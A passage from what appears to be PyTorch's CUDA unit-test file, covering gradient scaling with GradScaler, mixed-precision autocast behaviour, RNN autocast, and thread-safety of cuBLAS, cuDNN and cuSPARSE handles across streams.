self.assertTrue(d[dev1a] == "1b")
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_scale(self):
scaler = torch.cuda.amp.GradScaler(init_scale=2.)
t0 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0")
t1 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:1")
# Create some nested iterables of tensors on different devices.
outputs = (t1.clone(), (t0.clone(), t1.clone()), [t0.clone(), (t1.clone(), t0.clone())])
outputs = scaler.scale(outputs)
self.assertTrue(outputs[0] == 8.0 and outputs[1][0] == 8.0 and outputs[1][1] == 8.0 and
outputs[2][0] == 8.0 and outputs[2][1][0] == 8.0 and outputs[2][1][1] == 8.0)
self.assertTrue(scaler._scale.device == t1.device)
def test_grad_scaling_state_dict(self):
for lazy_init_scale in True, False:
s0 = torch.cuda.amp.GradScaler(init_scale=3., growth_factor=4., backoff_factor=.5, growth_interval=2)
s1 = torch.cuda.amp.GradScaler(init_scale=6., growth_factor=7., backoff_factor=.8, growth_interval=1)
# sets a random value for load_state_dict to overwrite
s1._init_growth_tracker = 7
if lazy_init_scale:
# Dummy scale() call to ensure the scale tensor is lazily initialized.
s1.scale(torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0"))
self.assertTrue(isinstance(s1._scale, torch.cuda.FloatTensor))
s1.load_state_dict(s0.state_dict())
self.assertEqual(s1.get_scale(), 3.)
self.assertEqual(s1.get_growth_factor(), 4.)
self.assertEqual(s1.get_backoff_factor(), .5)
self.assertEqual(s1.get_growth_interval(), 2)
self.assertEqual(s1._init_growth_tracker, 0)
def _create_scaling_models_optimizers(self, device="cuda"):
# Create a module+optimizer that will use scaling, and a control module+optimizer
# that will not use scaling, against which the scaling-enabled module+optimizer can be compared.
mod_control = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
mod_scaling = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
s.data.copy_(c.data)
opt_control = torch.optim.SGD(mod_control.parameters(), lr=1.0)
opt_scaling = torch.optim.SGD(mod_scaling.parameters(), lr=1.0)
return mod_control, mod_scaling, opt_control, opt_scaling
def _create_scaling_case(self, device="cuda", dtype=torch.float):
data = [(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device))]
loss_fn = torch.nn.MSELoss().cuda()
skip_iter = 2
return self._create_scaling_models_optimizers(device=device) + (data, loss_fn, skip_iter)
# _run_scaling_case generalizes some single-optimizer test logic to avoid too much copy-pasting below.
def _run_scaling_case(self, run, unskipped, skipped, atol=1e-7):
# Ensure scaling can be disabled without changing user control flow.
for enabled in True, False:
mod_control, mod_scaling, opt_control, opt_scaling, data, loss_fn, skip_iter = self._create_scaling_case()
# For functionality, test with a modest initial scale, and an unrealistically-large growth factor
# so any potential errors with the growth factor handling will be magnified.
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
_ = run(data, mod_control, opt_control, scaler, loss_fn, skip_iter, False)
ret = run(data, mod_scaling, opt_scaling, scaler, loss_fn, skip_iter, True)
# Allows run() to optionally return a different scaler instance.
scaler = ret if ret else scaler
# If scaling was enabled, the scale factor should have been multiplied by the growth factor
# len(data) - skipped times and the backoff factor "skipped" times.
if enabled:
net_growth = scaler.get_growth_factor()**unskipped if unskipped > 0 else 1.0
net_backoff = scaler.get_backoff_factor()**skipped if skipped > 0 else 1.0
self.assertTrue(scaler.get_scale() == (128. * net_growth * net_backoff))
else:
self.assertTrue(scaler.get_scale() == 1.0)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
self.assertTrue(torch.allclose(c, s, atol=atol))
# Compares no scaling + no autocasting against scaling + autocasting.
def test_grad_scaling_autocast(self):
try_pickle = False
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
with torch.cuda.amp.autocast(enabled=try_scaling_api):
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
if try_pickle:
scaler = pickle.loads(pickle.dumps(scaler))
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
return scaler
# sets atol=1e-3 because we're comparing pure fp32 arithmetic vs a mixture of fp16 and fp32
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
# this will be picked up by try_pickle within run():
try_pickle = True
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
def test_grad_scaling_clipping(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm * scaler.get_scale())
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
def test_grad_scaling_clipping_separate_unscale(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm, error_if_nonfinite=False)
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
@unittest.skipIf(IS_WINDOWS, 'FIXME: fix this test for Windows')
def test_grad_scaling_penalty(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
grad_params = torch.autograd.grad(scaler.scale(loss),
model.parameters(), create_graph=True)
inv_scale = 1. / scaler.get_scale()
grad_params = [p * inv_scale for p in grad_params]
else:
grad_params = torch.autograd.grad(loss, model.parameters(), create_graph=True)
grad_norm = 0
for grad in grad_params:
grad_norm += grad.pow(2).sum()
grad_norm = grad_norm.sqrt()
loss = loss + grad_norm
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
def test_grad_scaling_accumulation(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
iters_to_accumulate = 2
for i, (input, target) in enumerate(data):
output = model(input)
loss = loss_fn(output, target)
loss = loss / iters_to_accumulate
if try_scaling_api:
scaler.scale(loss).backward()
else:
loss.backward()
if (i + 1) % iters_to_accumulate == 0:
if try_scaling_api:
scaler.step(optimizer)
scaler.update()
optimizer.zero_grad()
else:
optimizer.step()
optimizer.zero_grad()
self._run_scaling_case(run, unskipped=2, skipped=0)
def test_grad_scaling_multiple(self):
# Tests gradient scaling with 2 models and 2 optimizers that both receive gradients from 2 losses.
# Some of the logic here cannot reuse the generic helper functions created for the 1-optimizer cases.
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers()
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input)
loss0 = loss_fn(0.3 * output0 + 0.7 * output1, target)
loss1 = loss_fn(0.6 * output0 - 0.4 * output1, target)
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertTrue(torch.allclose(c, s, atol=1e-7))
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_multigpu(self):
# Same as above, but runs some of the models on device 1.
# GradScaler should transparently handle losses and gradients on multiple devices.
# This test could be combined with the test above, but I think it makes sense to treat
# multi-GPU operations separately.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers(device=dev1)
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input.to(dev1))
loss0 = loss_fn(0.3 * output0 + 0.7 * output1.to(dev0), target)
loss1 = loss_fn(0.6 * output0.to(dev1) - 0.4 * output1, target.to(dev1))
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
# Make sure the found_infs were collected properly across optimizers and devices.
if scaler.is_enabled():
self.assertTrue(len(scaler._found_inf_per_device(optimizer0)) == 1)
self.assertTrue(len(scaler._found_inf_per_device(optimizer1)) == 1)
self.assertTrue(scaler._found_inf_per_device(optimizer0)[dev0].item() == 0.)
self.assertTrue(scaler._found_inf_per_device(optimizer1)[dev1].item() ==
float(i == skip_iter))
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
# Copy mod_control1 and mod_scaling1 back the device 0 for comparison
mod_control1.to(dev0)
mod_scaling1.to(dev0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertTrue(torch.allclose(c, s, atol=1e-7))
def test_cublas_multiple_threads_same_device(self):
# Note, these parameters should be very carefully tuned
# Too small number makes it hard for the racing condition
# to happen, while too large number sometimes cause hang
size = 1024
num_threads = 2
trials = 3
test_iters = 100
weight = torch.ones((size, size), device='cuda')
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but actually now races with its gemm.
results[t] = torch.mm(results[t], weight)
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@skipIfRocm
def test_cudnn_multiple_threads_same_device(self):
# This function is intended to test the lazy creation and reuse of per-thread
# cudnn handles on each device in aten/src/ATen/cudnn/Handles.cpp.
# Failure here likely indicates something wrong with that logic.
weight = torch.ones((1, 1, 2, 2), device='cuda')
results = {}
num_threads = 2
trials = 3
test_iters = 1000
barrier = threading.Barrier(num_threads)
with torch.backends.cudnn.flags(enabled=True):
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for _ in range(test_iters):
# If all threads are sharing the same cudnn handle,
# the following sequence may occur:
# thread 0 calls setCuDNNStreamToCurrent()
# thread 1 calls setCuDNNStreamToCurrent()
# thread 0 launches its raw convolution, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but now races with its convolution.
results[t] = torch.nn.functional.conv2d(results[t], weight, padding=0)
results[t].div_(4.0)
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((1, 1, 2048, 2048), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(),
(2048 - test_iters) * (2048 - test_iters))
def test_cusparse_multiple_threads_same_device(self):
size = 1024
num_threads = 2
trials = 3
test_iters = 500
def ones_sparse(size):
a = torch.arange(size, device='cuda')
indices = torch.cartesian_prod(a, a).t()
values = torch.ones(size * size, device='cuda')
return torch.sparse_coo_tensor(indices, values)
weight = ones_sparse(size)
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but actually now races with its gemm.
results[t] = weight.mm(results[t])
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
def _run_autocast_outofplace(self, op, args, run_as_type, out_type=None, module=torch, add_kwargs=None):
# helper to cast args
def cast(val, to_type):
if isinstance(val, torch.Tensor):
return val.to(to_type) if val.is_floating_point() else val
elif isinstance(val, collections.abc.Iterable):
return type(val)(cast(v, to_type) for v in val)
else:
return val
if add_kwargs is None:
add_kwargs = {}
self.assertFalse(torch.is_autocast_enabled())
with torch.cuda.amp.autocast():
self.assertTrue(torch.is_autocast_enabled())
out_type = out_type if out_type is not None else run_as_type
output = output_method = None
# Try module.* variant, if requested:
if module is not None and hasattr(module, op):
output = getattr(module, op)(*args, **add_kwargs)
if isinstance(output, torch.Tensor):
self.assertTrue(out_type == output.dtype,
"autocast for torch.{} produced {}, should produce {}"
.format(op, output.dtype, out_type))
# Try Tensor.* variant:
if hasattr(torch.Tensor, op):
output_method = getattr(args[0], op)(*args[1:], **add_kwargs)
if isinstance(output_method, torch.Tensor):
self.assertTrue(out_type == output_method.dtype,
"autocast for torch.{} produced {}, should produce torch.{}"
.format(op, output_method.dtype, out_type))
self.assertTrue((output is not None) or (output_method is not None),
"{} not found as an attribute on either Tensor or the requested module {}".format(
op, module))
# Accounts for ops that return Tensors, iterables, and other non-Tensors.
# For example, lstm_cell returns a tuple and equal returns bool.
def compare(first, second):
if isinstance(first, torch.Tensor):
return torch.equal(first, second)
elif isinstance(first, collections.abc.Iterable):
return all(compare(f, s) for f, s in zip(first, second))
else:
return first == second
# If both torch.* and Tensor.* variants were found, check outputs are identical
if (output is not None) and (output_method is not None):
self.assertTrue(type(output) == type(output_method))
comparison = compare(output, output_method)
self.assertTrue(comparison, "torch.{0} result did not match Tensor.{0} result".format(op))
# Compare numerics to Python-side "autocasting" that (we expect) does the same thing
# as the C++-side autocasting, and should be bitwise accurate.
output_to_compare = output if output is not None else output_method
with torch.cuda.amp.autocast(enabled=False):
self.assertFalse(torch.is_autocast_enabled())
if module is not None and hasattr(module, op):
control = getattr(module, op)(*cast(args, run_as_type), **add_kwargs)
else:
control = getattr(args[0].to(run_as_type), op)(*cast(args[1:], run_as_type), **add_kwargs)
self.assertTrue(type(output_to_compare) == type(control))
comparison = compare(output_to_compare, control)
self.assertTrue(comparison, "torch.{} result did not match control".format(op))
self.assertTrue(torch.is_autocast_enabled())
self.assertFalse(torch.is_autocast_enabled())
def args_maybe_kwargs(self, op_with_args):
if len(op_with_args) == 2:
return op_with_args[0], op_with_args[1], {}
else:
return op_with_args[0], op_with_args[1], op_with_args[2]
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
if not skip_test:
self._run_autocast_outofplace(op, args, torch.float16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp32(self):
for op_with_args in self.autocast_lists.torch_fp32:
op, args, maybe_kwargs = self.args_maybe_kwargs(op_with_args)
self._run_autocast_outofplace(op, args, torch.float32, add_kwargs=maybe_kwargs)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_need_autocast_promote(self):
for op, args in self.autocast_lists.torch_need_autocast_promote:
self._run_autocast_outofplace(op, args, torch.float32)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.torch_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, out_type=out_type)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp32(self):
for op, args in self.autocast_lists.nn_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_linalg_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.linalg_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._linalg)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.methods_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp32(self):
for op, args in self.autocast_lists.methods_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.methods_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, module=None, out_type=out_type)
def test_autocast_banned(self):
with torch.cuda.amp.autocast():
for op, args, module in self.autocast_lists.banned:
with self.assertRaises(RuntimeError):
getattr(module, op)(*args)
def test_autocast_ignored_types(self):
with torch.cuda.amp.autocast():
for ignore_type in (torch.double, torch.int32):
a_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
b_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
c_16 = torch.ones((8, 8), dtype=torch.float16, device="cuda:0")
# Tests if CastPolicy::fp16 ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with self.assertRaises(RuntimeError):
torch.mm(a_ignore, c_16)
with torch.cuda.amp.autocast(enabled=False):
type_no_autocast = torch.mm(a_ignore, b_ignore).dtype
self.assertTrue(torch.mm(a_ignore, b_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32 ops ignore double and int
with torch.cuda.amp.autocast(enabled=False):
type_no_autocast = torch.pow(a_ignore, 2.0).dtype
self.assertTrue(torch.pow(a_ignore, 2.0).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_set_opt_dtype ops ignore double and int
with torch.cuda.amp.autocast(enabled=False):
type_no_autocast = torch.sum(a_ignore).dtype
self.assertTrue(torch.sum(a_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_append_dtype ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with torch.cuda.amp.autocast(enabled=False):
type_no_autocast = torch.norm(a_ignore).dtype
self.assertTrue(torch.norm(a_ignore).dtype is type_no_autocast)
def test_autocast_custom_enabled(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd
def forward(ctx, a, b):
self.assertTrue(a.dtype is torch.float32)
self.assertTrue(b.dtype is torch.float32)
self.assertTrue(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertTrue(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), a.t().mm(grad)
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
y = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
with torch.cuda.amp.autocast():
output = mymm(x, y)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_custom_cast_inputs(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd(cast_inputs=torch.float32)
def forward(ctx, a, container, expect_type):
b = container[1][0]
self.assertTrue(a.dtype is expect_type)
self.assertTrue(b.dtype is expect_type)
self.assertFalse(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertFalse(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), None, None
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
# Puts one input tensor in a nested container. y's contained Tensor won't receive a gradient,
# because torch.autograd.Function can't hand gradients back to non-Tensor forward arguments.
# Sets requires_grad=False explicitly so we don't lie about expecting a gradient.
y = (0, {0: torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=False)})
with torch.cuda.amp.autocast():
output = mymm(x, y, torch.float32)
self.assertTrue(output.dtype is torch.float32)
loss = output.sum()
loss.backward()
# Tests if custom_fwd becomes a no-op when mymm runs outside an autocast-enabled region.
output = mymm(x, y, torch.float16)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_cat_jit(self):
# Reported at https://github.com/pytorch/pytorch/issues/38958
class Model(torch.nn.Module):
def forward(self):
a = torch.randn(1)
b = torch.randn(1)
c = torch.cat((a, b), 0)
d = torch.stack([c, c], 0)
return d
# The JIT here doesn't really matter, we just need to call
# cat via the boxed API
model = Model()
model_jit_script = torch.jit.script(model)
with torch.cuda.amp.autocast(True):
model()
model_jit_script()
# cudnn RNNs require special backend handling (weights are cast to FP16 and reflattened)
# so they get a dedicated test.
# Despite the large number of RNN cases it tries, the test takes < 15 seconds on a Titan V (similar to V100).
@skipIfRocm
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_rnn(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
# seq, batch, features, hidden size
clses = ("RNN", "GRU", "LSTM")
T, B, F, H = 3, 4, 5, 6
dtypes = (torch.float16, torch.float32)
input_layouts = ("seq_first", "batch_first", "packed")
for (cls, num_layers, bias, input_layout, bidirectional, try_nonpreflattened_weights,
input_dtype, hidden_dtype, weight_dtype) in \
product(clses, (1, 2), (True, False), input_layouts, (True, False), (True, False),
dtypes, dtypes, dtypes):
if input_layout == "seq_first":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
elif input_layout == "batch_first":
batch_first = True
x = torch.randn((B, T, F), device="cuda", dtype=input_dtype)
elif input_layout == "packed":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
x = torch.nn.utils.rnn.pack_padded_sequence(torch.randn((T, B, F),
device="cuda", dtype=input_dtype),
lengths=(3, 2, 1, 3),
enforce_sorted=False)
rnn = getattr(torch.nn, cls)(F, H, num_layers=num_layers, bidirectional=bidirectional,
bias=bias, batch_first=batch_first).cuda().to(dtype=weight_dtype)
if try_nonpreflattened_weights:
for p in rnn.parameters():
with torch.no_grad():
p.set_(p.clone())
h = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
if cls == "LSTM":
c = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
h = (h, c)
with torch.cuda.amp.autocast():
out, h_out = rnn(x, h)
out = out.data if input_layout == "packed" else out
self.assertEqual(out.dtype, torch.float16)
# Autocast wrapper requires at::_cudnn_rnn is autograd-exposed. This check can't guarantee
# at::_cudnn_rnn is autograd-exposed, but if it fires, it indicates some funny business has
# occurred and we should double check that at::_cudnn_rnn remains autograd-exposed.
self.assertEqual(out.grad_fn.name(), "CudnnRnnBackward")
out.sum().backward()
grads = [p.grad.clone() for p in rnn.parameters()]
rnn.zero_grad()
if cls == "LSTM":
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), (h[0].half(), h[1].half()))
else:
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), h.half())
out_control = out_control.data if input_layout == "packed" else out_control
out_control.sum().backward()
grads_control = [p.grad.clone() for p in rnn.parameters()]
# Compares with default tolerances, even for FP16 execution. Barring nondeterminism,
# autocast and control results should be bitwise identical.
self.assertEqual(out, out_control)
if cls == "LSTM":
self.assertTrue(h_out[0].dtype is torch.float16 and h_out[1].dtype is torch.float16)
self.assertEqual(h_out[0], h_out_control[0])
self.assertEqual(h_out[1], h_out_control[1])
else:
self.assertEqual(h_out.dtype, torch.float16)
self.assertEqual(h_out, h_out_control)
for grad, grad_control in zip(grads, grads_control):
self.assertEqual(grad.half(), grad_control)
def test_autocast_cache_leak(self):
# Reported at https://github.com/pytorch/pytorch/issues/48049
# Test is used to check, if autocast recaches the same parameters
# when executed in a `torch.no_grad()` block.
linear = torch.nn.Linear(10, 10).to('cuda')
data = torch.randn(1, 10, device='cuda')
with torch.cuda.amp.autocast():
with torch.no_grad():
out = linear(data)
first_iter_mem = torch.cuda.memory_allocated()
for _ in range(3):
out = linear(data)
self.assertTrue(first_iter_mem == torch.cuda.memory_allocated())
def test_autocast_checkpointing(self):
model = torch.nn.Sequential(torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8)).cuda()
input = torch.rand((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
with torch.cuda.amp.autocast():
output = checkpoint_sequential(model, 2, input)
self.assertTrue(output.requires_grad)
self.assertTrue(output.dtype is torch.float16)
output.sum().backward()
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_max_large_axis(self):
x = torch.zeros(2**32, device='cuda', dtype=torch.int8)
x[-1] = 1
val, idx = x.max(0)
self.assertEqual(val, 1)
self.assertEqual(idx, x.shape[0] - 1)
@unittest.skipIf(not TEST_NUMPY, "Numpy not found")
def test_to_numpy(self):
